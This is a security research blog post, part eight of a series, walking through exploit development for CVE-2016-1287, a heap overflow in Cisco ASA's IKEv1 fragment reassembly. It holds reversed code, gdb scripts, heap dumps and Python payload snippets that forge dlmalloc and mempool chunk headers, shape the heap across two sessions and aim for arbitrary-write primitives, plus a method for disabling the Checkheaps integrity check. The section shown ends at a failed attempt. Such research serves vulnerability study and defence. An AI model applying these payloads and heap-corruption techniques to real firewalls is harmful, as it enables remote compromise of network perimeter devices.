Cisco ASA series part eight: Exploiting the CVE-2016-1287 heap overflow over IKEv1

This article is part of a series of blog posts. We recommend that you start at the beginning. Alternatively, scroll to the bottom of this article to navigate through the whole series.

Exodus Intel released how they exploited [1] CVE-2016-1287 for IKEv2 in February 2016, but there wasn't anything public for IKEv1. This blog post documents our approach for exploiting the bug over IKEv1. If not specified otherwise, we target ASA 9.2.4 32-bit (asa924-k8.bin) though we confirmed most concepts work for all ASA 32-bit and 64-bit versions based on dlmalloc-2.8.x. All source code is reversed code and has been simplified in this documentation to contain only relevant parts for discussion.

Getting some knowledge

Logging allocations when a fragment is received

By setting breakpoints on malloc/calloc/free, we log allocations in the IKEv1 thread using the following gdb script. We do this by leveraging the dlchunk command which is part of libdlmalloc [2] and was discussed in a previous blog post. We recommend using asadbg, which integrates all the heap analysis tools we have developed: libdlmalloc, libptmalloc and libmempool.

The thread ID may differ in your case. It needs to be known in advance and can be determined by setting a breakpoint on an IKEv1 function and noting which thread hits it (e.g. IKE_AddRcvFrag, which is at 0x08681ED0 on ASA 9.2.4).

# end of calloc()
b *0x09BEC157 thread 2
commands
silent
printf "calloc -> "
dlchunk $edx-0x28
continue
end

# end of malloc()
b *0x09BEC0EF thread 2
commands
silent
printf "malloc -> "
dlchunk $edx-0x28
continue
end

# free()
b *0x09BEC1F0 thread 2
commands
silent
if (*(int*)($esp+4) == 0)
continue
else
set $addr = *(int*)($esp+4)
printf "free -> "
dlchunk $addr-0x28
end
continue
end

We log what happens when we send three fragments that get reassembled. The interesting parts are detailed below. As you can see, the names of the functions are displayed thanks to libmempool [3] and ret-sync [4], as detailed in previous blog posts.

FUNC      ADDRESS      CHUNK SIZE  FLAGS         WHO ALLOCATED THIS              WHAT FOR
// fragment 1
malloc -> 0xacb889d8 M sz:0x00050 fl:CP alloc_pc:ike_receiver_process_data+0x38e // pkt_info
malloc -> 0xacb88dd8 M sz:0x00090 fl:CP alloc_pc:ike_receiver_process_data+0x3ed // packet_ike
malloc -> 0xad424e10 M sz:0x00048 fl:CP alloc_pc:enqueue_ike_ext_action+0x17
calloc -> 0xacb89190 M sz:0x00048 fl:CP alloc_pc:IKE_AddRcvFrag+0x30c // frag queue
malloc -> 0xacb98c00 M sz:0x00038 fl:CP alloc_pc:IKE_AddRcvFrag+0x13c // queue entry1
free -> 0xad424e10 M sz:0x00048 fl:CP alloc_pc:enqueue_ike_ext_action+0x17
// fragment 2
malloc -> 0xacb98c38 M sz:0x00050 fl:CP alloc_pc:ike_receiver_process_data+0x38e // pkt_info
malloc -> 0xacb99408 M sz:0x00090 fl:CP alloc_pc:ike_receiver_process_data+0x3ed // packet_ike
malloc -> 0xad424e10 M sz:0x00048 fl:CP alloc_pc:enqueue_ike_ext_action+0x17
malloc -> 0xacb99498 M sz:0x00038 fl:CP alloc_pc:IKE_AddRcvFrag+0x13c // queue entry1
free -> 0xad424e10 M sz:0x00048 fl:CP alloc_pc:enqueue_ike_ext_action+0x17
// fragment 3
malloc -> 0xacb89e50 M sz:0x00050 fl:CP alloc_pc:ike_receiver_process_data+0x38e // pkt_info
malloc -> 0xacb89ea0 M sz:0x00090 fl:CP alloc_pc:ike_receiver_process_data+0x3ed // packet_ike
malloc -> 0xad424e10 M sz:0x00048 fl:CP alloc_pc:enqueue_ike_ext_action+0x17
malloc -> 0xacb88870 M sz:0x00038 fl:CP alloc_pc:IKE_AddRcvFrag+0x13c // queue entry1
malloc -> 0xacb985d8 M sz:0x00100 fl:CP alloc_pc:IKE_GetAssembledPkt+0x53 // reass packet

Importantly, there is an allocation at 0x086887bd for each IKE packet we receive. Then there is an allocation at 0x086821dc when the first fragment is received, creating a structure that defines the queue. Finally, each time a new fragment is received, an allocation at 0x0868200c creates a structure we call entry1, which tracks the raw IKEv1 packet (which we call packet_ike) by keeping a reference to a pkt_info structure. For instance, in the example above, 0xacb98c00 is a chunk holding an entry1 structure that points to the raw packet as follows: entry1->pkt_info->packet_ike = 0xacb88dd8.

struct entry1
{
    struct entry1* next;
    struct pkt_info* pkt_info;
    char seq_no;
    char unk1;
    char unk2;
    char unk3;
};

The pkt_info structure is approximately as follows:

struct pkt_info
{
    struct packet_ike* packet_ike; // points to IKE raw data
    int packet_length;             // length of IKE raw packet
    int flag;
    int field_C;
    int field_10;
    int field_14;
    void* field_18_ptr;
    int field_1C;
    int field_20;
};

Reversing code that adds fragments to the list and reassembles them

When an IKE packet is received (either IKEv1 or IKEv2), it is handled by the IKE receiver thread. It ends up allocating a buffer to hold the IKE packet before sending it over IPC to the right thread for processing.

void ike_receiver_process_data(struct ike_msg * msg)
{
    //...
    struct pkt_info* pkt_info = (struct pkt_info*)malloc(sizeof(struct pkt_info));
    pkt_info->packet_length = pkt_len;
    pkt_info->dst_ip = dst_ip;
    //...

    // For IKEv1 this is where the allocation for the packet happens
    // and this packet is stored later in the fragments list
    pkt_info->packet_ike = malloc(msg->len);
    memcpy(pkt_info->packet_ike, msg->data, msg->len);
    FREEB(msg);
    // ...
}

After some validation, the ikev1_parse_packet function is called. It checks if the embedded payload is a Cisco fragment and calls two functions if that is the case: IKE_AddRcvFrag and IKE_GetAssembledPkt.

void ikev1_parse_packet(struct pkt_info** p_pkt_info, struct ike_hdr_ext *ike_hdr_ext, struct ikev1_sa* ikev1_sa)
{
    //...
    struct packet_ike *packet_ike = (*p_pkt_info)->packet_ike;
    if (packet_ike->h.next_payload == CISCO_FRAG) {
        IKE_AddRcvFrag(ikev1_sa, *p_pkt_info);
        pkt_buffer = IKE_GetAssembledPkt(ikev1_sa);
        struct packet_ike* reassembled_pkt = pkt_buffer->data;
        //...
    } else {
        // any other kind of payload
    }
    //...
}

IKE_AddRcvFrag is responsible for adding a fragment to the queue. If there is no queue, one is created and initialised. Then the fragment ID is checked against the one currently being handled: if it is lower, the packet is ignored as it belongs to a previous fragmentation set; if it is higher, the previous set of fragments is deprecated and freed. If the fragment being parsed has the lastfrag flag set, its seqno is recorded to indicate the number of fragments needed.

Finally, the reassembly length is updated to take the new fragment into account. This is where the CVE-2016-1287 integer underflow vulnerability lies: 8 is subtracted, corresponding to the discarded Cisco fragmentation payload header. Note there is a check that the current reassembly length cannot exceed 32KB (0x8000).
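The underflow is easy to illustrate with a short Python sketch (a simplified model with our own naming, not the actual ASA code):

```python
# Simplified model of the assembled_len update performed by IKE_AddRcvFrag:
# the 8-byte Cisco fragmentation payload header is subtracted without first
# checking that payload_length >= 8.
def update_assembled_len(assembled_len, payload_length):
    assembled_len += payload_length - 8
    if assembled_len > 0x8000:
        raise ValueError("assembled pkt size too large")
    return assembled_len

# A fragment with payload_length = 1 *shrinks* the total by 7, and the
# 0x8000 upper-bound check never fires on the way down.
print(hex(update_assembled_len(0x200, 1)))  # 0x1f9
```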

int IKE_AddRcvFrag(struct ikev1_sa *ikev1_sa, struct pkt_info *pkt_info)
{
    DWORD res = 0;
    struct packet_ike* packet_ike = pkt_info->packet_ike;
    struct fragment_payload* fragment_payload = (struct fragment_payload*)&packet_ike->data;

    // Have we got a fragments queue already?
    if (!ikev1_sa->frag_queue1) {
        // allocates and initializes the fragment queue
        ikev1_sa->frag_queue1 = calloc(1, 0x14);
        ll_init(ikev1_sa->frag_queue1, IKE_FragCompare);
    }

    // Check fragment ID
    if (ikev1_sa->fragment_id == fragment_payload->id) {
        // same id as previously
        //...
    }
    else if (fragment_payload->id < ikev1_sa->fragment_id) {
        es_PostEvent("belongs to previous fragmentation set");
        goto b_end;
    }
    else {
        // new fragment id
        // this also resets ikev1_sa->frag_queue1->assembled_len
        // and ikev1_sa->frag_queue1->lastfrag_seqno
        IKE_FreeAllFrags(ikev1_sa, 0, 0);
        ikev1_sa->fragment_id = fragment_payload->id;
        es_PostEvent(...);
    }

    // Is it the last fragment?
    if (fragment_payload->last_frag & 0x1) {
        ikev1_sa->frag_queue1->lastfrag_seqno = fragment_payload->seq_no;
    }

    // Update reassembly length
    // This is where the underflow happens
    ikev1_sa->frag_queue1->assembled_len += fragment_payload->payload_length - 8;
    if (ikev1_sa->frag_queue1->assembled_len > 0x8000) {
        es_PostEvent("assembled pkt size too large");
        IKE_FreeAllFrags(ikev1_sa, 0, 0);
        goto b_end;
    }

    // add fragment to the list
    struct entry1* entry1 = malloc(0xC);
    entry1->seq_no = fragment_payload->seq_no;
    entry1->pkt_info = pkt_info;
    ll_add(ikev1_sa->frag_queue1, entry1);

b_end:
    return res;
}

The important bit here (compared to IKEv2) is that the pkt_info reference is saved and no new fragment structure is ever allocated. The new entry is added to the linked list.

int ll_add(struct frag_queue1 *frag_queue1, struct entry1 *entry1)
{
    entry1->next = frag_queue1->entry1;
    frag_queue1->frag_count += 1;
    frag_queue1->entry1 = entry1;
    return 1;
}

The IKE_GetAssembledPkt function is responsible for checking whether all the fragments have been received and for reassembling them, walking the fragment list and copying each fragment into a newly allocated buffer.

The function decides it has received all fragments when the lastfrag flag was set on a seqno equal to the number of received fragments. It then allocates a buffer for the reassembled packet, based on the assembled_len field accumulated as each fragment was received (in IKE_AddRcvFrag). Note the allocation size includes an extra 0x14 bytes, corresponding to the length of the pkt_buffer structure. Finally, it loops over all queued fragments to copy them into the newly allocated buffer.

Here it is important to note that the loop starts looking for fragments at a seqno of 1, so if we had sent a seqno=0 fragment, it would be skipped from the copy. The other interesting aspect is that if a seqno is missing, ll_find will fail to find it and the loop exits after freeing the reassembled packet. This is useful because we would like to avoid copying a 'negative length' fragment, as it could result in a large uncontrolled copy (aka a wild copy). For example, had we sent a fragment with a payload_length of 1, due to the integer underflow the computed length would be -7, which would result in a wild copy when passed as the length argument to memcpy().

struct pkt_buffer* IKE_GetAssembledPkt(struct ikev1_sa *ikev1_sa)
{
    // do not reassemble before the number of fragments equals saved supposed last frag
    if (!ikev1_sa || !ikev1_sa->frag_queue1
        || !ikev1_sa->frag_queue1->lastfrag_seqno
        || (ikev1_sa->frag_queue1->lastfrag_seqno != ikev1_sa->frag_queue1->frag_count)) {
        goto b_no_reassembly;
    }

    // allocate reassembled packet
    int alloc_size = ikev1_sa->frag_queue1->assembled_len + sizeof(struct pkt_buffer);
    struct pkt_buffer* pkt_buffer = malloc(alloc_size);
    pkt_buffer->total_size = ikev1_sa->frag_queue1->assembled_len;

    int curr_reass_len = 0; // reassembled packet length
    int curr_seqno = 1;
    struct entry1 cur_entry1;
    struct pkt_info* pkt_info;
    // loop on all fragments
    while (TRUE)
    {
        cur_entry1.seq_no = curr_seqno;
        struct entry1* entry1_found = ll_find(ikev1_sa->frag_queue1, &cur_entry1);
        if (!entry1_found) {
            free(pkt_buffer);
            pkt_buffer = NULL;
            goto free_before_end;
        }
        // update the reassembled packet length
        int curr_frag_len = entry1_found->pkt_info->packet_ike->payload_length - 8;
        curr_reass_len += curr_frag_len;

        // This check is incomplete.
        // We are able to corrupt things because it does not take into account
        // the sizeof(struct pkt_buffer) (0x14) added to alloc_size
        if (alloc_size < curr_reass_len) {
            es_PostEvent("Error assmbling fragments! Fragment data longer than packet.");
            free(pkt_buffer);
            pkt_buffer = NULL;
            goto free_before_end;
        }
        // Copy one fragment, at the offset accumulated before this fragment
        memcpy((char *)&pkt_buffer->data + curr_reass_len - curr_frag_len,
               entry1_found->pkt_info->packet_ike->data,
               curr_frag_len);
        curr_seqno += 1;
        // skip all fragments above the one we assume is the last one
        if (curr_seqno > ikev1_sa->frag_queue1->lastfrag_seqno)
            goto free_before_end; // break successfully
    }

b_no_reassembly:
    return NULL;
free_before_end:
    IKE_FreeAllFrags(ikev1_sa, NULL, NULL);
    return pkt_buffer;
}

What is most important above is that the check on the reassembled length is incomplete, as it does not take into account the additional 0x14 bytes. It means we can potentially copy up to 0x14 bytes past the end of the buffer. We will see later that we can actually overflow only up to 0x12 bytes due to some alignment.

Determining bug constraints & how to bypass them

The strategy is quite similar to Exodus Intel's for exploiting IKEv2 [1]. We send four fragments with seqno=0, seqno=1, seqno=3 and seqno=4.

  • seqno=1 is the only fragment with a positive length (e.g. 0x200 bytes)
  • seqno=0 and seqno=3 have a length of 1 (giving a negative length of -7)
  • seqno=4 has a length of 2 (giving a negative length of -6)

In total, -7-7-6 = -20 is added to the reassembly length, i.e. a delta of 0x14. However, only the seqno=1 fragment will ever be copied into the allocated buffer, as the other sequence numbers are out of the expected order.
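The resulting arithmetic can be checked with a short sketch (0x14 is sizeof(struct pkt_buffer); as detailed later, the copied data starts at offset 0x12 inside it):

```python
# seqno: payload_length for the four fragments we send
frags = {0: 1, 1: 0x200, 3: 1, 4: 2}

# IKE_AddRcvFrag accumulates (payload_length - 8) for each fragment
assembled_len = sum(l - 8 for l in frags.values())
assert assembled_len == (0x200 - 8) - 0x14  # the -20 delta

# IKE_GetAssembledPkt allocates assembled_len + sizeof(struct pkt_buffer)
alloc_size = assembled_len + 0x14

# only the seqno=1 fragment is copied, starting at offset 0x12
copied = frags[1] - 8
overflow = (0x12 + copied) - alloc_size
print(hex(overflow))  # 0x12 bytes written past the allocation
```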

What can we overflow?

As detailed in previous blog posts dedicated to libdlmalloc and libmempool, a call to malloc goes through wrapper functions that add an extra 0x24 bytes to the requested length (0x20 bytes for an mp_header and 0x4 bytes for an mp_footer). For instance, this is an allocated chunk:

(gdb) dlchunk 0xacb96a08 -v -x
struct malloc_chunk @ 0xacb96a08 {
prev_foot = 0x8180d4d0
size = 0x1d0 (CINUSE|PINUSE)
struct mp_header @ 0xacb96a10 {
mh_magic = 0xa11c0123
mh_len = 0x1a4
mh_refcount = 0x0
mh_unused = 0x0
mh_fd_link = 0xacb85b30 (OK)
mh_bk_link = 0xa8800604 (-)
allocator_pc = 0x86816b3 (IKE_GetAssembledPkt+0x53)
free_pc = 0x868161d (IKE_FreeAllFrags+0xfd)
0x1a8 bytes of chunk data:
0xacb96a30: 0x394d3943 0x59305239 0x747490ad 0x00163dff
0xacb96a40: 0x08021084 0x01000000 0xd4010000 0xb8010000
0xacb96a50: 0x00011100 0x00000000 0x00000000 0x00000000
...
0xacb96bd0: 0x00000000 0xa11ccdef
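As a sanity check, the 0x1d0 chunk size above can be related to its mh_len of 0x1a4 with a rough model of the overheads (our approximation: the 0x24 wrapper bytes plus dlmalloc's own 8-byte chunk header, rounded to 8-byte alignment):

```python
# Rough model (our approximation) of the effective dlmalloc-2.8.x chunk
# size for a mempool allocation on 32-bit ASA: 0x20-byte mp_header +
# 0x4-byte mp_footer + 0x8-byte dlmalloc header, 8-byte aligned.
def dlchunk_size(mh_len):
    return (mh_len + 0x20 + 0x4 + 0x8 + 7) & ~7

assert dlchunk_size(0x1a4) == 0x1d0  # the allocated chunk shown above
assert dlchunk_size(0x1d4) == 0x200  # a 0x1d4 request lands in a 0x200 chunk
```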

And this is a free chunk:

struct malloc_chunk @ 0xacb96bd8 {
prev_foot = 0x8180d4d0
head = 0x30 (PINUSE)
fd = 0xac825ab8
bk = 0xa880005c
struct mp_header @ 0xacb96be8 {
mh_refcount = 0xf3ee0123
mh_unused = 0x0
mh_fd_link = 0x0 (unmapped)
mh_bk_link = 0x0 (unmapped)
allocator_pc = 0x0 (-)
free_pc = 0x0 (-)
0x8 bytes of chunk data:
0xacb96c00: 0x00000000 0xf3eecdef

The following is the positive-length fragment (the only one actually reassembled) that we send alongside the negative-length fragments to obtain the 0x12-byte overflow. It will be allocated in a 0x200-byte chunk. We can see that we can overflow up to the mh_len field of the next chunk if it is allocated.

n = 0x1dc 
buf = ''
buf += struct.pack("<I", 0xa11ccdef) # mh footer magic
buf += struct.pack("<I", 0x8180d4d0) # dl prev_foot
buf += struct.pack("<I", 0x203) # dl size
buf += struct.pack("<I", 0xa11c0123) # mh_magic
buf += struct.pack("<H", 0x1d4) # mh_len
buf = "U" * (n - 8 - len(buf)) + buf
sess.send_fragment(seqno=1, fragid=0x100, lastfrag=0, fragdata=buf)

Similarly, the following will allocate into a 0x1d0-byte chunk. We can overflow up to the middle of bk if the following chunk is free.

n = 0x1dc-0x30 
buf = ''
buf += struct.pack("<I", 0xa11ccdef) # mh footer magic
buf += struct.pack("<I", 0x8180d4d0) # dl prev_foot
buf += struct.pack("<I", 0x31) # dl size
buf += struct.pack("<I", 0x54545454) # dl fd
buf += struct.pack("<H", 0x5353) # dl bk
buf = "U" * (n - 8 - len(buf)) + buf
sess.send_fragment(seqno=1, fragid=0x100, lastfrag=0, fragdata=buf)

Note that above we only show a 0x12-byte overflow. This is because the copied data starts 2 bytes before the end of the pkt_buffer structure, so we can really overflow only 0x14-2=0x12 bytes.

struct pkt_buffer
{
    int field_0;
    int field_4;
    int field_8;
    int field_C;
    int16 total_size;
    int16 data; // data starts here
};
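The offsets can be double-checked with ctypes (the field names are our own labels from reversing, but the 32-bit layout matches the dumps):

```python
import ctypes

# Layout check of our reversed pkt_buffer definition: four 32-bit
# fields followed by two 16-bit fields, no padding required.
class pkt_buffer(ctypes.Structure):
    _fields_ = [
        ("field_0",    ctypes.c_int32),
        ("field_4",    ctypes.c_int32),
        ("field_8",    ctypes.c_int32),
        ("field_C",    ctypes.c_int32),
        ("total_size", ctypes.c_int16),
        ("data",       ctypes.c_int16),
    ]

assert ctypes.sizeof(pkt_buffer) == 0x14
assert pkt_buffer.data.offset == 0x12  # data starts 2 bytes before the end
```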

Bypassing Checkheaps

We discussed Checkheaps in a previous blog post. Checkheaps is a mechanism used to verify heap integrity. It works by calling validate_buffers() every 60 seconds by default, and is heavily based on dlmalloc-2.8.3 built with the DEBUG constant defined. For those who didn't review the earlier post: Checkheaps works by linearly scanning all chunks, starting from the lowest segment address, and determining the next chunk from the current chunk's size. Depending on whether a chunk is free or in use, it performs the appropriate checks.

int ch_is_validating = 0;

void validate_buffers(int check_depth)
{
    if (ch_is_validating != 0)
        return;
    ch_is_validating = 1;

    // loop on all mspaces
    while (...)
    {
        //...
        // custom version of dlmalloc function
        // note this is inlined...
        custom_traverse_and_check(cur_dlmstate, check_depth);
    }

finished:
    ch_is_validating = 0;
    return;
}

The important bit here is if we can set ch_is_validating to a value different from zero, we can prevent validate_buffers() from ever executing again, completely bypassing Checkheaps.

Exploit strategy

To simplify exploitation, for now we will assume Checkheaps is disabled. We effectively disable it with gdb by setting the global ch_is_validating to 1.

(gdb) set *(int*)0x0B2545E0 = 1

We assume the ASA device has been started recently, so the heap is not too fragmented. In a real attack scenario, this state could be forced by crashing the target if necessary. That is a poor assumption for an ideal real-world scenario, as crashing the target is noisy, but it helps us build a more reliable exploit.

Using the linked list to get a mirror write

The strategy is to target either the dlmalloc-2.8.x free lists unlinking and/or the mempool alloc lists unlinking to be able to write an almost arbitrary value to an almost arbitrary address (aka a ‘mirror write’). We choose the term mirror write because the operation of unlinking an element from a list will allow us to trigger two write operations (one write will typically be useful and the other is an unavoidable side effect). This gives a constraint that both values need to be writable addresses as they will be written to the other address (+ offset).

Below, M is the mspace, P is the chunk to unlink and S is its size.

/* Unlink a chunk from a smallbin */
#define unlink_small_chunk(M, P, S) {\
  mchunkptr F = P->fd;\
  mchunkptr B = P->bk;\
  bindex_t I = small_index(S);\
  assert(P != B);\
  assert(P != F);\
  assert(chunksize(P) == small_index2size(I));\
  if (F == B)\
    clear_smallmap(M, I);\
  else if (RTCHECK((F == smallbin_at(M,I) || ok_address(M, F)) &&\
                   (B == smallbin_at(M,I) || ok_address(M, B)))) {\
    F->bk = B;\
    B->fd = F;\
  }\
  else {\
    CORRUPTION_ERROR_ACTION(M);\
  }\
}

Let's say we manage to corrupt the P dlmalloc-2.8.x chunk i.e. we control P->fd and P->bk. This means we control the values of the F and B pointers, which correspond to edx and edi in the assembly below:

.text:09BE530D    mov [edi+0Ch], edx   ; F->bk = B;
.text:09BE5310    mov [edx+8], edi     ; B->fd = F;

The two instructions above are the operations of the mirror write and can be leveraged to overwrite two 32-bit values in memory.
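A toy model of the mirror write, simulating memory as a dict of 32-bit slots (the addresses below are arbitrary examples):

```python
# F and B model the attacker-controlled fd/bk values of the corrupted
# chunk; unlinking it performs the two writes shown in the assembly.
mem = {}

def unlink(F, B):
    mem[F + 0xC] = B  # F->bk = B
    mem[B + 0x8] = F  # B->fd = F

# To write VALUE at TARGET, pick F = TARGET - 0xC and B = VALUE; both
# must be writable addresses because of the mirrored side effect.
TARGET, VALUE = 0x0B2545E0, 0x0C000000  # arbitrary example addresses
unlink(TARGET - 0xC, VALUE)
assert mem[TARGET] == VALUE              # the useful write
assert mem[VALUE + 0x8] == TARGET - 0xC  # the unavoidable side effect
```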

Overflowing into adjacent free chunk to target its size (head) field

We saw earlier that when the adjacent chunk is allocated, we can't reach the mempool header list pointers: being limited to a 0x12-byte overflow, we can only corrupt up to mh_len, so mh_bk_link/mh_fd_link are out of reach. Similarly, when the adjacent chunk is free, we can only overflow up to the middle of bk, so we are unable to control both what would be written and where (again due to the 0x12-byte limit).

Instead, we use a similar approach to the Exodus Intel IKEv2 exploit [1]: we overflow into an adjacent free chunk to target its size (head) field. This works because 0x12 bytes is enough to reach the dlmalloc-2.8.x size (head) field of the adjacent chunk. We only need two -7 negative fragments, as they result in a 14-byte (0xe) delta, meaning we overflow 14-2=12 bytes (the copied data starting two bytes before the end of the pkt_buffer structure). Our overflowing reassembled packet then gets freed because of a missing fragment (we didn't send a seqno=2), so it is coalesced with the adjacent, now-oversized free chunk. The resulting chunk encompasses the adjacent chunk:

n = 0x1dc-0x30-0x6-SIZE_FRAG_HEADER
buf = ''
buf += struct.pack("<I", 0xa11ccdef) # mh footer magic
buf += struct.pack("<I", 0x8180d4d0) # dl prev_size (prev_foot)
#buf += struct.pack("<I", 0x31) # original dl size (head)
buf += struct.pack("<I", 0x91) # new dl size to encompass the following chunk
buf = "b" * (n - len(buf)) + buf
sess.send_fragment(seqno=1, fragid=0x100, lastfrag=0, fragdata=buf)
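The three 32-bit words appended to the fragment above exactly fill the 12-byte overflow budget:

```python
import struct

# Two payload_length=1 fragments give a delta of 0xe; the copy starts
# 2 bytes before the end of pkt_buffer, leaving 0xc bytes of overflow:
# just enough for the footer magic, prev_foot and the forged size.
tail  = struct.pack("<I", 0xa11ccdef)  # our chunk's mh footer magic
tail += struct.pack("<I", 0x8180d4d0)  # adjacent chunk's prev_foot
tail += struct.pack("<I", 0x91)        # forged size for the adjacent chunk
assert len(tail) == 0xe - 2 == 0xc
```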

Heap feng shui

To be able to reliably overwrite a free chunk and have it encapsulate an adjacent chunk of a specific size, we need to remotely manipulate the heap in order to have a deterministic layout.

Crafting the heap with a deterministic layout scenario one: all from one session

Since we know about all of the allocations that occur when a fragment is received, our idea is to send fragments in two different sessions in order to create holes. We use two sessions and send one fragment in session 1, then one fragment in session 2, then one fragment in session 1, then one fragment in session 2, etc. Then we send one fragment with lastfrag=1 set in session 1 to trigger reassembly. This will free all the session 1 fragments that are not needed anymore since a new packet was reassembled. The reassembled packet will be ignored because it is not valid, but we don't care.
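This alternation can be modelled with a toy simulation (pure Python, ignoring real allocator ordering details):

```python
# 'M' = allocated chunk, 'F' = free chunk (hole); each round lands one
# chunk per session adjacently on the heap.
heap = []
for _ in range(3):
    heap.append(["session2", "M"])
    heap.append(["session1", "M"])

# Triggering reassembly in session 1 frees all of its packets...
for chunk in heap:
    if chunk[0] == "session1":
        chunk[1] = "F"  # ...turning them into holes

assert [state for _, state in heap] == ["M", "F"] * 3
```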

This creates the following layout. M indicates an allocated chunk, F indicates a free chunk (i.e. a hole):

0xa9901a18 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed //session2
0xa9901c18 F sz:0x00200 fl:-P free_pc:0x0868161d,IKE_FreeAllFrags+0xfd //session1 - hole
0xa9901e18 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed //session2
0xa9902018 F sz:0x00200 fl:-P free_pc:0x0868161d,IKE_FreeAllFrags+0xfd //session1 - hole
0xa9902218 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed //session2

Then we trigger the reassembly of our buffer that will end up being allocated into a hole. Note we choose a length of 0x1d0 for our chunk so it leaves a 0x30-byte free chunk behind. This is exactly the same as Exodus Intel's approach. Below we see how useful libdlmalloc can be for showing us our layout:

0xa9901a18 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xa9901c18 M sz:0x001d0 fl:CP alloc_pc:0x086816b3,IKE_GetAssembledPkt+0x53 //reassembled packet
0xa9901de8 F sz:0x00030 fl:-P free_pc:0x42424242,- //remaining 0x30 hole
0xa9901e18 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xa9902018 F sz:0x00200 fl:-P free_pc:0x0868161d,IKE_FreeAllFrags+0xfd //hole
0xa9902218 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed

Corrupting a size (head) field to encompass one adjacent allocated chunk

Using the initial overflow, we decide to change the size of the 0x30-byte free chunk to make it look like a 0x90-byte chunk instead.

n = 0x1dc-0x30-0x6-SIZE_FRAG_HEADER
buf = ''
buf += struct.pack("<I", 0xa11ccdef) # mh footer magic
buf += struct.pack("<I", 0x8180d4d0) # dl prev_size (prev_foot)
#buf += struct.pack("<I", 0x31) # original dl size (head)
buf += struct.pack("<I", 0x91) # new dl size to encompass the following chunk
buf = "E" * (n - len(buf)) + buf

Now, when the 0x1d0-byte chunk is coalesced with the adjacent corrupted 0x90-byte free chunk, it gives a 0x1d0+0x90=0x260-byte free chunk (instead of the 0x1d0+0x30=0x200-byte free chunk we would normally get). We then only have to send another fragment to fill this newly freed 0x260-byte chunk.

We craft the 0x260-byte fragment such that the original 0x30-byte free chunk is replaced with a fake free chunk that has controlled fd/bk pointers. This is done because the 0x200-byte in-use chunk adjacent to the old free chunk can have its dlmalloc-2.8.x header modified to believe it's still adjacent to the fake free chunk. This means when the in-use chunk is freed it will be coalesced with the fake free chunk, giving us a first mirror write.

Additionally, we modify the 0x200-byte adjacent in-use chunk's mempool headers to facilitate yet another mirror overwrite.

For the purpose of testing, we use invalid values for bk/fd and mh_fd_link/mh_bk_link below: 0xffff5050, 0xffff5054, 0xffff5250 and 0xffff5254.

n = 0x260-ALLOC_OVERHEAD_32-SIZE_IKE_HEADER-SIZE_FRAG_HEADER
buf = ''

# 0x1d0 alloc chunk restored (mh_len = 0x1a4)
buf += "F" * (0x1a4-SIZE_IKE_HEADER-SIZE_FRAG_HEADER)
buf += struct.pack("<I", 0xa11ccdef) # mh footer magic

# 0x30 free chunk with corrupted prev/next freelist pointers
buf += struct.pack("<I", 0x8180d4d0) # dl prev_size (not set as prev chunk allocated)
buf += struct.pack("<I", 0x31) # dl size (PINUSE=1)
buf += struct.pack("<I", 0xffff5050) # bk (to get mirror write)
buf += struct.pack("<I", 0xffff5054) # fd (to get mirror write)
buf += struct.pack("<I", 0xf3ee0123) # mh_refcount used as free magic
buf += struct.pack("<I", 0x0) * 6 # ...
buf += struct.pack("<I", 0xf3eecdef) # mh footer magic

# restore 0x200 allocated chunk with corrupted prev/next alloclist pointers
buf += struct.pack("<I", 0x30) # dl prev_size (set as prev chunk freed)
buf += struct.pack("<I", 0x202) # dl size (restored) (CINUSE=1)
buf += struct.pack("<I", 0xa11c0123) # mh_magic
buf += struct.pack("<I", 0x1d4) # mh_len (restored)
buf += struct.pack("<I", 0x0) # mh_refcount (restored)
buf += struct.pack("<I", 0x0) # mh_unused (restored)
buf += struct.pack("<I", 0xffff5250) # mh_fd_link (to get mirror write)
buf += struct.pack("<I", 0xffff5254) # mh_bk_link (to get mirror write)
buf += struct.pack("<I", 0x42414443) # allocator_pc (unused)
buf += struct.pack("<I", 0x42414443) # free_pc (unused)
buf += "G" * (n - len(buf))

Freeing them all (failure due to overwritten pointers)

In order to get our mirror writes, we trigger the reassembly of session 2 in order to free the corrupted chunks. This has the neat side effect of freeing the 0x200 chunk after our reassembled packet. You’ll recall that the layout was the following:

0xa9901c18 M sz:0x001d0 fl:CP alloc_pc:0x086816b3,IKE_GetAssembledPkt+0x53     //reassembled packet
0xa9901de8 F sz:0x00030 fl:-P free_pc:0x42424242,-
0xa9901e18 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed //session2

When the 0x200 chunk at the bottom of the list shown above is freed, the mempool function (mh_mem_free) first unlinks the chunk from the corresponding doubly linked mempool list. This should trigger our first mirror write. Then mspace_free is called and the heap allocator (dlmalloc-2.8.x) should look at adjacent chunks and coalesce with any adjacent free chunks. Since there is a free 0x30-byte chunk before the 0x200-byte one, it will unlink the 0x30-byte free chunk and coalesce it with the newly freed 0x200-byte chunk to give a 0x230-byte chunk, which will be added to the free list. The coalescing of the free chunks should in turn trigger our second mirror write.

Interestingly, however, when we trigger the exploit we get an invalid access while unlinking the free chunk. This means that our corrupted mempool header pointers were not unlinked in the way we expected, as that mempool unlink operation should’ve triggered a SIGSEGV before the coalescing triggered its own SIGSEGV.

Thread 2 received signal SIGSEGV, Segmentation fault.
0x09be530d in ?? ()
(gdb) x /i $pc
=> 0x9be530d: mov DWORD PTR [edi+0xc],edx
(gdb) x /10wx $edi
0xffff5050: Cannot access memory at address 0xffff5050

This can be explained by the fact that we sprayed lots of 0x200-byte chunks in session 2. When we send the last fragment to trigger reassembly and free them all, the unlink operation happens for each of those fragment chunks. Since they are all the same 0x200-byte size, they all sit on the same mempool list as the corrupted chunk, along with the other chunks that are part of the session 2 feng shui. They are also all part of the linked list of fragments making up the queue. When non-corrupted chunks are freed first, unlinking them overwrites our corrupted mh_fd_link and mh_bk_link fields. Consequently, they no longer hold the values we provided: one or both links now point to a different entry on the linked list, which prevents our mirror write from working as intended.

To conclude, this approach won't work as is. We need a different heap layout in which we can arbitrarily free a single 0x200-byte chunk, so that our mh_fd_link and mh_bk_link pointers are not overwritten by other fragment chunks being freed first.
